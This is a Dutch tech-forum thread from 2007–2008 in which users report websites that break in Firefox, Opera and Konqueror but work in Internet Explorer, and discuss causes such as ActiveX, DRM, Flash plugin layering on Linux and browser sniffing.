Toon posts:

Websites die niet onder niet-IE browsers werken...(deel 3)

Pagina: 1 2 Laatste
Acties:
  • 8.529 views sinds 30-01-2008
  • Reageer

• smokalot
  • Registratie: Juni 2001
  • Laatst online: 10-07-2022

smokalot

titel onder

Fuzzillogic schreef op zondag 23 september 2007 @ 23:21:

Qua succes heb je zeker gelijk, maar waarom zou je als klant niet eens kwaad mogen worden als een bedrijf zulke stommiteiten begaat?
qua "recht" heb je helemaal gelijk, maar wie schiet er iets mee op als jij een boos wordt? jij niet, het bedrijf in kwestie niet, en de rest van de maatschappij ook niet.

wordt vooral boos, maar uit dat constructief!

trouwens, valt het jullie ook op dat het echt enorm verbeterd is de afgelopen jaren? ik gebruik al jaren konqueror, die nu bijna alles prima rendert, en als het een keer misgaat werkt het in firefox wel.

Browsen is volgens mij nauwelijks meer een issue voor de acceptatie van GNU/Linux, en mensen hebben inmiddels bijna de volledig vrije keuze welke browser ze gebruiken.

Misschien tijd voor een topic ala "Programmaatjes die niet onder niet-windows systemen werken...", zoals de fotoalbumbestelsoftware van Albert Heijn, Kruidvat, etc.?

It sounds like it could be either bad hardware or software

• Jouke74
  • Registratie: Juni 2006
  • Laatst online: 15-03 11:39
Geen flame bedoeld maar: "Websites die niet onder niet-IE browsers werken..."

Is dit niet makkelijker: "Websites die alleen onder IE browsers werken..."

"That was left handed..." - JJH

• Bravo
  • Registratie: Augustus 2005
  • Laatst online: 18-03 17:49

Bravo

Second Best

Iets wat tegenwoordig wel meer een issue wordt (voor mij dan) is dat er gecontroleerd wordt welke browser wordt gebruikt en aan de hand daarvan de functionaliteit wordt bepaald.
Als voorbeeld xs.utwente.nl (mail voor Universiteit Twente studenten), hier heb je als je surgt met IE de mogelijkheid tot premium services, waaronder het ingelogd blijven en een popup ontvangen bij nieuwe email. Ik als FF gebruiker mis deze functionaliteit, net als een aantal andere handige adresboekopties.

Zijn er nog meer van dit soort websites die wel goed gerendered kunnen worden door non IE, maar welke aan funtionaliteit inboetten?

Flickr
Canon 6D
17-40mm f/4 + 50mm f/1.8 II + 70-200mm f/4 | 2x 430EX II | Sirui T005 + C10

• EdwinG
  • Registratie: Oktober 2002
  • Laatst online: 19-03 13:10
Bravo schreef op maandag 24 september 2007 @ 11:05:Zijn er nog meer van dit soort websites die wel goed gerendered kunnen worden door non IE, maar welke aan funtionaliteit inboetten?
Voor zover ik weet heeft hotmail ook een lite-versie, die onder alle browsers werkt. Wat het verschil in functionaliteit is weet ik echter niet, aangezien ik nooit de "volledige" versie heb gebruikt.
Met mijn huidige browser wil het trouwens helemaal niet werken, de pagina toont een halve seconde, en gaat daarna verder met 'laden'.

Bezoek eens een willekeurige pagina

• terabyte
  • Registratie: September 2001
  • Laatst online: 28-01 16:24

terabyte

kan denken als een computer

deadinspace schreef op zondag 23 september 2007 @ 22:19:
[...]

Aangezien ze die site net vernieuwd hebben, reageren ze nu misschien vrij snel op feedback. Het lijkt mij dus geen slecht idee om gewoon even contact met ze op te nemen hierover. Een brief weegt daarbij misschien zwaarder dan een email.
Via het officiele webformulier kom ik iig niet ver, want na het invullen van mijn gegevens kom ik gewoon op de voorpagina van de ABN AMRO site terecht :')

edit:

Mail aan webmaster@abnamro.nl
werkt ook niet. Krijg ik een melding over Domino of iets dergelijks.

Het grote probleem is: aan wie stuur ik mijn brief, en komt mijn brief uberhaupt wel terecht bij iemand die snapt waar ik het over heb.
Wat je in ieder geval moet doen is vriendelijk en beleefd uitleggen wat het probleem is. Dat oogst meestal veel meer succes :)
Ik hoop niet dat je deze opmerking hebt neergezet omdat je denkt dat ik IRL ook zo'n toon geergerde toon zou aanslaan.

[Voor 6% gewijzigd door terabyte op 24-09-2007 19:44]

• Sjah
  • Registratie: Juli 2000
  • Laatst online: 21:22
Bij sommigen helpt het beter om een ietswat harde, maar beleefd zakelijke, toon aan te slaan, ik noem maar naar een makelaar of iemand waarmee je zakelijk geschil hebt. Bij anderen helpt vriendelijkheid beter, schelden daarentegen heeft vrijwel nooit zin.

• WeeJeWel
  • Registratie: April 2007
  • Laatst online: 20-03 17:27
Kijk eens naar http://www.illegaaltje.nl/, een of andere kiddie (ik ken hem via msn, echt en vaag persoon maar oke) die denkt dat 'ie kan hacken. Dit staat op z'n site:
Je maakt geen gebruik van buggy internet explore. Deze website wordt het beste weergeven in Internet Explore
Ehm, ben ik de enige die dit vreemd vind?

Homey — Critics are those without skills to create.

• marcieking
  • Registratie: Februari 2005
  • Niet online

marcieking

Mannetje Pug en een stokbrood

WeeJeWel schreef op maandag 24 september 2007 @ 19:49:
Kijk eens naar http://www.illegaaltje.nl/, een of andere kiddie (ik ken hem via msn, echt en vaag persoon maar oke) die denkt dat 'ie kan hacken. Dit staat op z'n site:

[...]

Ehm, ben ik de enige die dit vreemd vind?
De hele website die gewoon gruwelijk lelijk is of die tekst? De tekst vind ik idd ook vreemd, maar niet iedereen kan spellen. De website is daarentegen gewoon dieptriest, je moet toch kunnen zien dat dit een ramp is :P

https://onzetaal.nl/taaladvies/welke-die/

• icyx
  • Registratie: Januari 2007
  • Niet online

icyx

chown -R us ./base

Die site is inderdaad erg triest, wat voor raar ventje is het? Ik weet wel dat iemand die ik ken ook zo achterlijk is geweest zijn emailadres + wachtwoord bij dat msn spul in te vullen, ik kreeg namelijk een keer een spam mail van illegaaltje.nl, het viel op omdat het nederlandse spam was in mijn spam folder ;)

When you think you’ve succeeded / but something’s missing / means you have been defeated / by greed, your weakness.

• Sjah
www.cheaptickets.nl Als je dan een vlucht gevonden hebt( zoek maar bijv. op amsterdam-kathmandu, enkele reis) krijg je lijstje goedkope tickets te zien... Als je dan op groene "klik hier" drukt om zo'n reis verder te boeken, doet die niks... javascript doet het niet. In IE dus wel goed he ,lekker dan. Ach dan is dat IE toch handig als backup. :)

edit: ik heb het over Fx 2

[Voor 4% gewijzigd door Sjah op 25-09-2007 22:51]

• Jungian
  • Niet online
Even tussendoor : wie heeft hier het MSN-adres
r0y at huisje punt nl
, heeft mij ooit toegevoegd (maar nooit wat gezegd :+) en heeft op het eerder genoemde kansloze illegaaltje.nl zijn contactenlijst geïmporteerd ? Ik zal vast niet de enige zijn die deze kansloze spammeuk niet zo heel cool vind.

0.0

• Sjah
godveer www.funda.nl doet het echt niet goed in Firefox, dus dat wordt geen Fx installen bij me pa, die Funda-junk is. Wat doet het niet goed? Zoek maar een huis en probeer bijbehorende foto's maar eens te browsen, lukt niet, in IE uiteraard wel foutloos. :(

• Jungian
  • Niet online
Sjah schreef op woensdag 26 september 2007 @ 17:02:
godveer www.funda.nl doet het echt niet goed in Firefox, dus dat wordt geen Fx installen bij me pa, die Funda-junk is. Wat doet het niet goed? Zoek maar een huis en probeer bijbehorende foto's maar eens te browsen, lukt niet, in IE uiteraard wel foutloos. :(
Dat gaat anders prima hier.

0.0

• Sjah
Hebben wij het over hetzelfde? Recht staant klein fotos onder elkaar die je kan klikken, links verschijnt dan de grote foto in IE. In Fx niks hoor.

edit: je hebt gelijk: adblock plus uitzetten en alles ok nu, tjeezzz..

[Voor 20% gewijzigd door Sjah op 26-09-2007 17:29]

• ibmos2warp
  • Laatst online: 28-10-2020

ibmos2warp

Eval is Evil

Sjah schreef op dinsdag 25 september 2007 @ 22:42:
www.cheaptickets.nl Als je dan een vlucht gevonden hebt( zoek maar bijv. op amsterdam-kathmandu, enkele reis) krijg je lijstje goedkope tickets te zien... Als je dan op groene "klik hier" drukt om zo'n reis verder te boeken, doet die niks... javascript doet het niet. In IE dus wel goed he ,lekker dan. Ach dan is dat IE toch handig als backup. :)

edit: ik heb het over Fx 2
Sowieso die hele website is vaag. Als ik dus dan naar kathmandu zoek, dan is er niks beschikbaar. Wil ik opnieuw zoeken, door een andere plaats in te vullen werkt dat zoek geval maar half.
Hehe lol
JavaScript:
1
javascript:scrollTo(0,eval(window.scrolPUB1_HR_AMS_BTS.offsetTop + 50))

Eval is evil. Euh, volgens mij klopt het niet eens... Maar das ook logisch als het niet werkt

Ik weet alles van niks
Vind Excel ongelovelijk irritant.

Anoniem: 175386

Sjah schreef op woensdag 26 september 2007 @ 17:02:
offtopic:
De Front-Ender die aan funda.nl heeft gewerkt is een bekende van mij. Gebruik van webstandaarden staan bij hem hoog in het vaandel :)

• Sjah
ibmos2warp schreef op woensdag 26 september 2007 @ 17:50:
[...]

Sowieso die hele website is vaag. Als ik dus dan naar kathmandu zoek, dan is er niks beschikbaar. Wil ik opnieuw zoeken, door een andere plaats in te vullen werkt dat zoek geval maar half.
Hehe lol
JavaScript:
1
javascript:scrollTo(0,eval(window.scrolPUB1_HR_AMS_BTS.offsetTop + 50))

Eval is evil. Euh, volgens mij klopt het niet eens... Maar das ook logisch als het niet werkt
Ja stomme site. Ga als je ticket zoekt maar naar www.vliegtickets.nl

Anoniem: 47671

[zucht/]
Ben weer bijna aan een nieuwe lease-bak toe. Ga ik hier op de zaak (opera op XP) naar toyota.nl: No go.
Nou stel ik mij graag pricipieel op, met zo'n site geen omzet van mij. Maar ja, om nou Opel te gaan rijden....
[diepe] [zucht] [/diepe]

• ibmos2warp

ibmos2warp

Eval is Evil

Weer eentje die het niet doet:
http://www.boschuniverse.org/
Het al zo super duidelijke menu werkt niet onder firefox (zal het ook wel niet onder opera werken).
Stom javascript menu.... :/

offtopic:
Wisten jullie eigenlijk dat een haywain (Eng) een hooiwagen is?

Ik weet alles van niks

• Vaan Banaan
  • Registratie: Februari 2001
  • Niet online

Vaan Banaan

Heeft ook Apache ontdekt

ibmos2warp schreef op woensdag 31 oktober 2007 @ 21:32:
Weer eentje die het niet doet:
http://www.boschuniverse.org/
Het al zo super duidelijke menu werkt niet onder firefox (zal het ook wel niet onder opera werken).
Stom javascript menu.... :/
offtopic:
Wisten jullie eigenlijk dat een haywain (Eng) een hooiwagen is?
In Opera werkt het volgens mij wel normaal. Alleen heb ik geen flash draaien, dus zie ik sowieso erg wienig op die site

500 "The server made a boo boo"

• ibmos2warp

ibmos2warp

Eval is Evil

Vaan Banaan schreef op donderdag 01 november 2007 @ 14:29:
[...]

In Opera werkt het volgens mij wel normaal. Alleen heb ik geen flash draaien, dus zie ik sowieso erg wienig op die site
Hé lol, idd werkt ie wel onder Opera... Maar dan nog, blijft een irri website.

Ik weet alles van niks

• Sjah
http://www.woningnet.nl/ Een belangrijke website voor veel mensen, die goed lijkt te werken in Firefox. Tot je er mee zaken wilt doen, blijk je IE nodig te hebben voor bekijken van foto's (via een ActiveX plugin),en nog erger, als je wilt reageren op een woning, verschijnt de knop bevestigen niet in Firefox.

voor de foto's krijg je:CycloMedia CycloScopeLite

Voor deze viewer is minimaal Microsoft Internet Explorer versie 5.01 (versie 5.00.2920) noodzakelijk. Wanneer u een te lage Microsoft Internet Explorer versie heeft, kunt u deze upgraden via de Microsoft website.

:(

[Voor 30% gewijzigd door Sjah op 11-11-2007 21:54]

• Sebazzz
  • Registratie: September 2006
  • Laatst online: 19:26
http://www.ocztechnology.com
De website van OCZ. Het menu valt achter de flashreclame onder de menubalk.

Waarschijnlijk simpel op te lossen door de z-index te veranderen.

[Voor 24% gewijzigd door Sebazzz op 11-11-2007 20:42]

[Te koop: 3D printers] [Website] Agile tools: [Return: retrospectives] [Pokertime: planning poker]

• marcieking
  • Registratie: Februari 2005
  • Niet online

marcieking

Mannetje Pug en een stokbrood

The Triad schreef op zondag 11 november 2007 @ 20:41:

Doet het hier prima :)

https://onzetaal.nl/taaladvies/welke-die/

• crisp
  • Registratie: Februari 2000
  • Nu online

crisp

Devver

Pixelated

The Triad schreef op zondag 11 november 2007 @ 20:41:

Firefox onder windows kan wel HTML-elementen boven flash laten zien, onder linux echter weer niet. Dat is niet zozeer een probleem van de site maar meer een flash(plugin)-gerelateerd probleem ism browsers op bepaalde platformen. Oude versies van IE hadden hier overigens ook last van.

En nee, het is niet simpel op te lossen met z-index...

Intentionally left blank

• RuudBurger
  • Registratie: Oktober 2003
  • Laatst online: 13-03 16:09
Sjah schreef op zondag 11 november 2007 @ 20:25:
http://www.woningnet.nl/ Een belangrijke website voor veel mensen, die goed lijkt te werken in Firefox. Tot je er mee zaken wilt doen, blijk je IE nodig te hebben voor bekijken van foto's (via een ActiveX plugin),en nog erger, als je wilt reageren op een woning, verschijnt de knop bevestigen niet in Firefox.

voor de foto's krijg je:CycloMedia CycloScopeLite

Voor deze viewer is minimaal Microsoft Internet Explorer versie 5.01 (versie 5.00.2920) noodzakelijk. Wanneer u een te lage Microsoft Internet Explorer versie heeft, kunt u deze upgraden via de Microsoft website.

:(
ik erger me bij woningnet meer aan het overmatig gebruik van de POST functie.. je kan niet terug gaan zonder een alert te krijgen dat je de gegevens nog een keer "POST". Daarnaast is een woning openen in een tabje ook niet mogelijk.

Het reageren op een woning heeft bij mij nooit problemen opgeleverd, donderdag de sleutel halen! ^^

• Sjah
Sillymidget schreef op zondag 11 november 2007 @ 23:06:
[...]

Het reageren op een woning heeft bij mij nooit problemen opgeleverd, donderdag de sleutel halen! ^^
Feli, daar zit een vriendin van me die hier komt reageren, ook op te hopen (heeft voorrangsverklaring, dus komt wel goed). Dus bij jou zit reageren wel goed, welke browser gebruik je, windows of linux of mac? Of zou me adblocker weer zitten te kutten... :X

• !GN!T!ON
  • Laatst online: 21-03 11:47
www.studiemeter.nl :(

de site die mn school gebruikt voor nederlands, elke NL les rebooten naar winxp om op die K-site te moeten werken :(

bij inloggen zegt hij dat de site alleen met IE werkt in firefox, als je de useragent van FF naar IE vervangt en dan inlogt loopt FF vast :(

• Fuzzillogic
  • Registratie: November 2001
  • Laatst online: 04-12-2022
!GN!T!ON schreef op maandag 12 november 2007 @ 00:31:
www.studiemeter.nl :(

de site die mn school gebruikt voor nederlands, elke NL les rebooten naar winxp om op die K-site te moeten werken :(

bij inloggen zegt hij dat de site alleen met IE werkt in firefox, als je de useragent van FF naar IE vervangt en dan inlogt loopt FF vast :(
Wow. Natuurlijk moet FF niet vastlopen, maar als je ziet hoe die site gemaakt is verbaast het me niet zo heel veel. Frames, tabellen en links die enkel met javascript werken. Uitgeverij Deviant moet zich diep schamen.

• Sebazzz
crisp schreef op zondag 11 november 2007 @ 23:00:
[...]

Firefox onder windows kan wel HTML-elementen boven flash laten zien, onder linux echter weer niet. Dat is niet zozeer een probleem van de site maar meer een flash(plugin)-gerelateerd probleem ism browsers op bepaalde platformen. Oude versies van IE hadden hier overigens ook last van.

En nee, het is niet simpel op te lossen met z-index...
Geen oplossing dus? :/

[Te koop: 3D printers] [Website] Agile tools: [Return: retrospectives] [Pokertime: planning poker]

• WeeJeWel
  • Laatst online: 20-03 17:27
Hyves verbergt de elementen als er een menu opent, waarschijnlijk is dat de meest verstandige oplossing.

Homey — Critics are those without skills to create.

• Fuzzillogic
WeeJeWel schreef op maandag 12 november 2007 @ 16:16:
Hyves verbergt de elementen als er een menu opent, waarschijnlijk is dat de meest verstandige oplossing.
De verstandige keuze zou zijn om niet op iedere pagina crappy flash-meuk te gebruiken... Maarja, krijg dat maar eens aan het verstand gepeuterd van marketing droids.

• killercow
  • Registratie: Maart 2000
  • Laatst online: 20-03 16:42
Er wordt aan een oplossing gewerkt, bij zowel mozilla als Adobe, Het is een probleem met de window manager waarbij de plugin als een los window aangemeld wordt.

Vreemd genoeg kan de Konqueror browser het wel goed.

Ook zin in een outdoor geek-fest? eth0.nl

• deadinspace
  • Laatst online: 18-03 15:08

deadinspace

The what goes where now?

killercow schreef op maandag 12 november 2007 @ 17:01:
Er wordt aan een oplossing gewerkt, bij zowel mozilla als Adobe, Het is een probleem met de window manager waarbij de plugin als een los window aangemeld wordt.
Het heeft helemaal niks met window managers te maken; het probleem is simpelweg dat de Netscape plugin API op Unix plugins een eigen X window geeft om in te tekenen. Dat plugin window zweeft dus altijd boven de rest van de pagina (en dus ook boven HTML elementen die eigenlijk boven de plugin zouden moeten).

Mogelijke oplossingen:
  • De API aanpassen/uitbreiden zodat er niet langer een los window gebruikt wordt.
  • HTML elementen die boven een plugin moeten hun eigen X window geven welke dan weer boven het plugin window geplaatst wordt (yuch)
  • Het losse plugin window embedden in het window van de browser (niet zeker in hoeverre dat mogelijk/haalbaar is)
Vreemd genoeg kan de Konqueror browser het wel goed.
Gebruikt Konqueror Netscape plugins, of heeft het een eigen plugin API? In het laatste geval doen ze misschien een van de laatste twee suggesties hierboven.

• ODF
  • Laatst online: 17-03 13:06
Firefox 3 "Gran Paradiso" heeft geen last meer van menu's die achter flash elementen verdwijnen, dus het is al opgelost maar nog even wachten tot Maart 2008 als de final uitkomt van Firefox 3.

Klaverjassen op je Pocket PC?! Klik hier!

• Sjah
dan pas, ik dacht dat het Nov. dit jaar zou komen?

• Sebazzz
ODF schreef op maandag 12 november 2007 @ 18:04:
Firefox 3 "Gran Paradiso" heeft geen last meer van menu's die achter flash elementen verdwijnen, dus het is al opgelost maar nog even wachten tot Maart 2008 als de final uitkomt van Firefox 3.
Goed punt. Firefox 3 staat in de repos van Ubuntu, dus even installeren. Die kan je zo te zien naast Firefox 2 installeren. Edit: De alpha uit de repos heeft het probleem nog wel.

[Voor 6% gewijzigd door Sebazzz op 12-11-2007 18:57]

• Maasluip
  • Registratie: April 2002
  • Laatst online: 14:57

Maasluip

Frontpage Admin

Kabbelend watertje

Mag het ook andersom? Website die niet (fatsoenlijk) in IE werkt maar wel in Firefox.

http://bouwcam.windesheim.nl/

Een live streaming webcam. IE begint te miepen dat je een ActiveX control moet installeren en laat geen beeld zien (ik neem aan dat hij ook geen beeld laat zien als je die control geïnstalleerd hebt maar hem geen toestemming geeft om te runnen).
Firefox heeft er verder helemaal geen probleem mee, laat het beeld en de Axis controls zien.

Alleen kun je de controls niet gebruiken omdat daar een wachtwoord op zit. Nog een reden waarom het belachelijk is dat IE geen beeld laat zien (ActiveX installeren voor controls die je niet kunt gebruiken...)

Dat slof sigaretten met de pak melk - D/T-regels
Open Source landkaart

• VisionMaster
  • Laatst online: 11-03 19:52

VisionMaster

Security!

Bruiloftsite.nl wil ik ook aangeven voor Firefox.

Zie de hartjes maar vliegen op onze site:
http://sandraenoscar.bruiloftsite.nl

Gek genoeg werkt het prima in Safari.

I've visited the Mothership @ Cupertino

Anoniem: 116547

Nieuwe online muziekdienst:
http://www.nu.nl/news/145...streamen_bij_Jaha.nl.html

Hij werkt alleen niet onder Firefox:
http://www01.jaha.nl/neehee.html

En wat weer een humor in de URL ;)

• Jungian
  • Niet online
Anoniem: 116547 schreef op donderdag 28 februari 2008 @ 15:19:
Nieuwe online muziekdienst:
http://www.nu.nl/news/145...streamen_bij_Jaha.nl.html

Hij werkt alleen niet onder Firefox:
http://www01.jaha.nl/neehee.html

En wat weer een humor in de URL ;)
:D Wat moet hier nu van terecht komen ? :')

0.0

• VisionMaster

VisionMaster

Security!

Jungian schreef op donderdag 28 februari 2008 @ 15:29:
[...]

:D Wat moet hier nu van terecht komen ? :')
Lekker simpel :D
Nieuwe websites alleen voor IE, dat is toch zo <2004

• Muthas
  • Registratie: December 2005
  • Niet online
Kijken hoelang het duurt voordat iemand daar erachter komt dat die google analytics tracker op neehee.html toch wel erg veel hits heeft :X

• Fuzzillogic
Muthas schreef op donderdag 28 februari 2008 @ 18:57:
Kijken hoelang het duurt voordat iemand daar erachter komt dat die google analytics tracker op neehee.html toch wel erg veel hits heeft :X
Hah. Nou. Ik als fervente surfer heb juist google analytics en al die andere tracker-drek in mijn block-list staan, omdat ik te vaak heb staan wachten op respons van een tracking-site, en omdat ik mijn privacy nog enigszins wil bewaren. En ik gok dat ik niet de enige ben. En ik gok dat de mensen die dat ook hebben vooral géén IE gebruiken...

• dominic
  • Laatst online: 21:04

dominic

will code for food

VisionMaster schreef op donderdag 28 februari 2008 @ 18:51:
[...]

Lekker simpel :D
Nieuwe websites alleen voor IE, dat is toch zo <2004
Er zit wel een reden achter; jaha.nl is een luisterdienst waarvan de streams via MMS/RTSP lopen en bovendien voorzien worden van DRM. Daardoor is een Windows Media Player client nodig om de content af te spelen. Icm met WMP plugin voor FireFox zou je zeggen dat het moet werken, maar helaas loopt dan het hele DRM verhaal de soep in. Helaas dus IE only.

En als je vraagt: Waarom moet er dan DRM op? Dan is het antwoord simpel: dat moet van Warner, SonyBMG, Universal en EMI..

Download my music on SoundCloud | Stream my music on Spotify

• VisionMaster

VisionMaster

Security!

dominic schreef op vrijdag 29 februari 2008 @ 11:58:
[...]

Er zit wel een reden achter; jaha.nl is een luisterdienst waarvan de streams via MMS/RTSP lopen en bovendien voorzien worden van DRM. Daardoor is een Windows Media Player client nodig om de content af te spelen. Icm met WMP plugin voor FireFox zou je zeggen dat het moet werken, maar helaas loopt dan het hele DRM verhaal de soep in. Helaas dus IE only.
Dit kan VLC ook prima voor mij oplossen (als er geen DRM op die streas werd gebruikt). Daarnaast heb ik Perian (een bulk plugins pakket) voor QuickTime, waaronder ondersteuning voor de Windows Media formaten. Dat stuk is uitgegeven door Microsoft zelf.
En als je vraagt: Waarom moet er dan DRM op? Dan is het antwoord simpel: dat moet van Warner, SonyBMG, Universal en EMI..
Laat ik me niet uitlaten over DRM :D Ik vind het hoe dan ook stom om doodsimpel aan te nemen dat als je geen IE hebt, dat je dan dus ook nooit gebruik kan maken van deze service/dienst. Uiteindelijk moet het DRM-enabled streampje door een mediaplayer (eventueel via een plugin of library) worden verhaspelt. Als de DRM netjes genoeg werkt is het onmogelijk om dit met VLC te doen, maar misschien wel met een plugin die door MS zelf is distribueerd.

• Len
  • Registratie: November 2000
  • Laatst online: 16:58

Len

Leeg

Jaha.nl werkt niet in mijn internet explorer (:mac) ;)

Free Tibet

• crisp
  • Nu online

crisp

Devver

Pixelated

Len schreef op vrijdag 29 februari 2008 @ 21:41:
Jaha.nl werkt niet in mijn internet explorer (:mac) ;)
Ik dacht dat IE/Mac ondertussen wel uitgestorven was, het is immers een dinosaurus zo oud...

Intentionally left blank

• VisionMaster

VisionMaster

Security!

crisp schreef op vrijdag 29 februari 2008 @ 22:03:
[...]

Ik dacht dat IE/Mac ondertussen wel uitgestorven was, het is immers een dinosaurus zo oud...
Er worden altijd nog fosielen gevonden, groot en klein.

Ik ben eerder benieuwd naar browsers die de browser ID kunnen overschrijven met iets anders dan Mozilla, Safari of Opera in zo'n geval. Heeft Opera die functie nog in de Mac versie? Effe proberen ;)

• Sebazzz
Ik kan het niet testen met Firefox, want ik zit hier op de al uberstabiele beta 3 maar de User Agent extensie (van de maker van de Webdeveloper extensie) is niet compatible, en ik ben te lui om de xpi aan te passen.

edit: User Agent extensie werkt. Jaha tot nu toe ook.

edit2: Jaha werkt voor geen meter, hangt enorm veel aan Javascript die duidelijk nogal IE only is. Firefox kan er niks mee. De redirect is trouwens op Javascript basis, dus als je redirecten via Javascript uitzet kan je gewoon surfen. Ik heb Jaha ook even in de w3c validator gegooid, deze vertelt dat de framepagina valide XHTML is. De rest van de pagina's valideert ie niet want hij wordt doorgestuurd met een redirect.

[Voor 54% gewijzigd door Sebazzz op 29-02-2008 22:38]

• dominic

dominic

will code for food

Sebazzz schreef op vrijdag 29 februari 2008 @ 22:22:
Ik kan het niet testen met Firefox, want ik zit hier op de al uberstabiele beta 3 maar de User Agent extensie (van de maker van de Webdeveloper extensie) is niet compatible, en ik ben te lui om de xpi aan te passen.

edit: User Agent extensie werkt. Jaha tot nu toe ook.

edit2: Jaha werkt voor geen meter, hangt enorm veel aan Javascript die duidelijk nogal IE only is. Firefox kan er niks mee. De redirect is trouwens op Javascript basis, dus als je redirecten via Javascript uitzet kan je gewoon surfen. Ik heb Jaha ook even in de w3c validator gegooid, deze vertelt dat de framepagina valide XHTML is. De rest van de pagina's valideert ie niet want hij wordt doorgestuurd met een redirect.
Gek eh, dat een IE-only website het niet in FireFox doet :P en toch testen hahah. Vergeet het maar, hij is 100% voor IE gemaakt.

• Sebazzz
Het viel toch te proberen :P Misschien doen ze het alleen omdat ze door Microsoft gesponsord of gedwongen zijn, weet ik veel :P

• VisionMaster

VisionMaster

Security!

Sebazzz schreef op zaterdag 01 maart 2008 @ 11:24:
Het viel toch te proberen :P Misschien doen ze het alleen omdat ze door Microsoft gesponsord of gedwongen zijn, weet ik veel :P
Ik kon het me voorstellen dat het IE minded was ivm de DRM methode die gekozen is. Maar ja... om je website dan zo enorm afhankelijk te maken van IE-only is natuurlijk pure onzin.

• Fuzzillogic
dominic schreef op zaterdag 01 maart 2008 @ 11:06:
[...]

Gek eh, dat een IE-only website het niet in FireFox doet :P en toch testen hahah. Vergeet het maar, hij is 100% voor IE gemaakt.
Eerlijk gezegd vind ik het behoorlijk dom om zelfs in een IE-only site nog IE-only javascript te gebruiken als er een standards-compliant en cross-platform "alternatief" is. Maar van een site die met frames is opgebouwd kun je alles verwachten :/

Als ik in de code kijk dan tref ik dit commentaar aan: ORIGINELE PLANET HTML

Goh, ehh.. Planet, DRM, muziek, IE-only, waar hebben we dat eerder gehoord? Juist ja. Heeft Planet/KPN de restanten nou inderdaad gewoon verkocht? Zodat ze weer een nieuwe groep mensen kunnen bezeiken met DRM-drek?

Rond dit soort IE-only-sites hangt gewoon al een smerig luchtje. Het luchtje van makkelijk geld verdienen, gladde praatjes en beunhazerij. Maar dat is mijn mening dan.

• dominic

dominic

will code for food

Fuzzillogic schreef op zaterdag 01 maart 2008 @ 12:09:
[...]

Eerlijk gezegd vind ik het behoorlijk dom om zelfs in een IE-only site nog IE-only javascript te gebruiken als er een standards-compliant en cross-platform "alternatief" is. Maar van een site die met frames is opgebouwd kun je alles verwachten :/

Als ik in de code kijk dan tref ik dit commentaar aan: ORIGINELE PLANET HTML

Goh, ehh.. Planet, DRM, muziek, IE-only, waar hebben we dat eerder gehoord? Juist ja. Heeft Planet/KPN de restanten nou inderdaad gewoon verkocht? Zodat ze weer een nieuwe groep mensen kunnen bezeiken met DRM-drek?

Rond dit soort IE-only-sites hangt gewoon al een smerig luchtje. Het luchtje van makkelijk geld verdienen, gladde praatjes en beunhazerij. Maar dat is mijn mening dan.
En hoeveel geld verdien jij aan websites dan? :P

• Fuzzillogic
dominic schreef op zaterdag 01 maart 2008 @ 16:00:
[...]

En hoeveel geld verdien jij aan websites dan? :P
Het is geen makkelijk geld, heb geen gladde praatjes en ik beunhaas niet.

• Kanseleur
  • Laatst online: 08-02 12:44
Bij mij doet Jaha het als ik google-analytics block... Heb Opera 9.50b/Ubuntu 7.10 (Masked als IE).

[Voor 11% gewijzigd door Kanseleur op 01-03-2008 16:12]

Acties:
  • 0Henk 'm!

• dominic

dominic

will code for food

Fuzzillogic schreef op zaterdag 01 maart 2008 @ 16:04:
[...]

Het is geen makkelijk geld, heb geen gladde praatjes en ik beunhaas niet.
Tja ik denk toch dat je eerst wat meer onderzoek moet doen voordat je mensen bestempeld als beunhazen en weet ik veel. Ik krijg het idee dat je niet helemaal weet waarover je praat en dat een site als jaha.nl toch een behoorlijke onderneming is om op te zetten, helemaal al om alle platenmaatschappijen tevreden te houden.

• AW_Bos
  • Laatst online: 22:15

AW_Bos

Liefhebber van nostalgie... 🕰️

3,5 jaar later:

Ariën Clay in "Websites die niet onder niet-IE browsers..."
Nog steeds niks veranderd :'(.
Associaal :'( :'(

[Voor 6% gewijzigd door AW_Bos op 27-03-2008 01:12]

☀️ Goedemorgen zonneschijn! ☀️
☀️Ja, je maakt me zo gelukkig, en door jou voel ik me fijn! ☀️

• Comgenie
  • Registratie: Oktober 2005
  • Laatst online: 15:36

Comgenie

Soms heb je dat

Bij ons op school gebruiken ze 'natschool'. Een soort portal waar je wat bestanden kan uploaden, berichtjes naar elkaar kan sturen en nieuwsberichten kan zien. Verder niks eigenlijk. Behalve dat het mega traag is, werkte het tot 'n jaar terug niet in firefox (kreeg je javascript popupje enzo).
Inmiddels werkt het wel met firefox.. Maar hebben ze dat via een WTF?!?! manier gedaan... Ze hebben nu serieus een firefox addon die je moet installeren, voordat je met firefox erop kunt komen :').
En dat nou terwijl die site afaik echt geen enkel appart iets heeft. Zelfs geen ajax. :/.

No animals were harmed in the making of this comment.

• Alex)
  • Registratie: Juni 2003
  • Laatst online: 31-01 23:56
Nou, ga die add-on dan disassemblen, kijken wat hij doet :Y)

We are shaping the future

• Jungian
  • Niet online
Met Safari (lees : WebKit) signaleer ik geen problemen. :)

0.0

• sky-
  • Registratie: November 2005
  • Niet online

sky-

¿Öngyilkos Vasarnap

Comgenie schreef op donderdag 27 maart 2008 @ 01:06:
Bij ons op school gebruiken ze 'natschool'. Een soort portal waar je wat bestanden kan uploaden, berichtjes naar elkaar kan sturen en nieuwsberichten kan zien. Verder niks eigenlijk. Behalve dat het mega traag is, werkte het tot 'n jaar terug niet in firefox (kreeg je javascript popupje enzo).
Inmiddels werkt het wel met firefox.. Maar hebben ze dat via een WTF?!?! manier gedaan... Ze hebben nu serieus een firefox addon die je moet installeren, voordat je met firefox erop kunt komen :').
En dat nou terwijl die site afaik echt geen enkel appart iets heeft. Zelfs geen ajax. :/.
Dan draaien ze nog een oude versie van N@TSchool. Bij ons op school wordt inmiddels de nieuwe versie gedraait, en moet zeggen dat het nog steeds niet goed werkt en ik probeer het daarom altijd te vermijden. Ik gebruik zelf geen FF maar Opera en daar werkt het ook niet in..

don't be afraid of machines, be afraid of the people who build and train them.

• Xander
  • Nu online
Alex) schreef op donderdag 27 maart 2008 @ 01:12:
Nou, ga die add-on dan disassemblen, kijken wat hij doet :Y)
IE embedden? :+

PC specs!---Pulse mee voor GoT!
[22:49:37] <@Remy> ik wil een opblaasbare dSLR :+

• bazkar
  • Laatst online: 29-08-2021
Ook geen problemen onder FF eerlijk gezegd.

http://eu.battle.net/wow/en/character/earthen-ring/bazkar/ http://eu.battle.net/wow/en/character/wildhammer/bazkar/

• deadinspace
  • Laatst online: 18-03 15:08

deadinspace

The what goes where now?

